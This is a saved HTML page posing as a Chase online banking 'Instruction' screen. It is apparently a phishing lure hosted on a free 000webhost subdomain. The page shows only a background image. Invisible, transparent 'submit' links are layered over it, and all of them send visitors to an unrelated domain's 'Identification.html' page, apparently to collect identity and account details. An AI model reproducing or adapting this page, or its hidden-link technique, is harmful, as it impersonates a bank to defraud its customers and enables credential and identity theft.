<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- saved from url=(0014)about:internet -->
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Chase online - Instruction</title>
<meta name="GENERATOR" content="Created by officialhome Website builder http://www.homename.com">
<meta name="HOSTING" content="Hosting Provided By hgator http://www.hostgator">
<link rel="shortcut icon" href="https://candy-striped-groun.000webhostapp.com/log/24/24/inse/secclog/RRiiHyttUuiTtrtyuy/cha8ank/imgs/favicon.ico" type="image/vnd.microsoft.icon">
<link rel="icon" href="https://candy-striped-groun.000webhostapp.com/log/24/24/inse/secclog/RRiiHyttUuiTtrtyuy/cha8ank/imgs/favicon.ico" type="image/vnd.microsoft.icon"><style type="text/css">
<style type="text/css">
body
{
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
   img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="mx" style="margin:0;padding:0;position:absolute;left:-1px;top:-1px;width:318px;height:483px;text-align:left;z-index:3;">
<img src="Chase%20online%20-%20Instruction_files/next-bg.png" id="" alt="" border="0" align="top"></div>
<div id="mxl" style="position:absolute;left:0px;top:0px;width:1371px;height:713px;z-index:4">
<a id="bluebutton" type="button" value="submit" href="https://www.hkdcrandom.com/chikc/Identification.html" style="position:absolute;left:644px;top:703px;width:60px;height:18px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2">
</a></div><a id="bluebutton" type="button" value="submit" href="https://www.hkdcrandom.com/chikc/Identification.html" style="position:absolute;left:644px;top:703px;width:60px;height:18px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2">
</a><div style="text-align: right;position: fixed;z-index:9999999;bottom: 0; width: 100%;cursor: pointer;line-height: 0;display:block !important;"><a id="bluebutton" type="button" value="submit" href="https://www.hkdcrandom.com/chikc/Identification.html" style="position:absolute;left:644px;top:703px;width:60px;height:18px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2"></a><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&amp;utm_campaign=000_logo&amp;utm_medium=website_candy-striped-groun&amp;utm_content=footer_img"><img src="Chase%20online%20-%20Instruction_files/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"></a></div></body></html>